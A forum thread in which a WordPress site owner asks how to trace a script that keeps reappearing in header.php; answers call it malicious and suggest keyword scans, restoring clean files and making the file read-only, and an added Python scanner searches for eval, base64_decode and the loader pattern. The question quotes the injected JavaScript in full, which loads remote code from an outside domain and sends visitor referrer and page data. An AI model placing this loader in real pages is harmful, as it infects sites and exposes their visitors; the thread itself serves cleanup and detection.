The source of a script in header.php

Time: 2016-02-12 19:42:27

Tags: javascript php wordpress

My website is a WordPress site. The following code appears in Header.php every few hours; when I delete it, it appears again after a few hours. Please note that the link in the code, “shiro-maga.com”, changes every time. The code is as follows:

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://shiro-maga.com/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://shiro-maga.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

I believe that the theme is infected ("scan shows no malware"), so it generates this script. Could you please advise how to find the source of this script?

Thanks

2 answers:

Answer 0 (score: 0)

Definitely malicious. Your site has been compromised. You can use the following detailed article to find and remove the source of the infection: http://ottopress.com/2009/hacked-wordpress-backdoors/. A program like Windows Grep will help you run a quick scan on all your theme files for keywords like eval and base64. Remove all suspicious strings of code from your theme and then update the WordPress core files to ensure you are running a clean version. Alternatively, if you have a backup, restore your theme's backup and update your site with a clean updated version of WP.
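
The keyword search described in the answer above, as an added example that is not part of the original question or answers. It looks for the eval and base64 keywords the answer names, plus the part of the injected loader from the question that does not contain the changing domain; the file extensions scanned, the default `wp-content` path and the assumption that the `/js/jquery.min.php?c_utt=` fragment stays the same between reinfections are choices made for this example.

```python
import os
import re
import sys
import time

# Keywords named in the answer (eval, base64) plus the fragment of the injected
# loader from the question that does not depend on the rotating domain.
PATTERNS = {
    "eval-call": re.compile(rb"\beval\s*\("),
    "base64-decode": re.compile(rb"base64_decode\s*\("),
    "injected-loader": re.compile(rb"/js/jquery\.min\.php\?c_utt="),
}
EXTENSIONS = (".php", ".js", ".htaccess")  # assumption: file types worth scanning


def scan_tree(root):
    """Return (mtime, path, line_no, pattern_name) hits, newest file first."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    lines = fh.read().splitlines()
                mtime = os.path.getmtime(path)
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            for line_no, line in enumerate(lines, 1):
                for label, rx in PATTERNS.items():
                    if rx.search(line):
                        hits.append((mtime, path, line_no, label))
    # Newest files first as a triage aid: the script comes back every few
    # hours, so recent changes are worth reading first (mtime can be altered).
    return sorted(hits, key=lambda h: (-h[0], h[1], h[2]))


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "wp-content"
    for mtime, path, line_no, label in scan_tree(root):
        stamp = time.strftime("%Y-%m-%d %H:%M", time.localtime(mtime))
        print(f"{stamp}  {label:<16} {path}:{line_no}")
```

Hits are leads for manual review, not verdicts: legitimate plugins and themes also call eval and base64_decode.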

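Answer 1 (score: 0)

A quick fix to prevent reinfection is to CHMOD header.php to 444 (read-only). The site will work and will not be infected again, giving you time to find the infection.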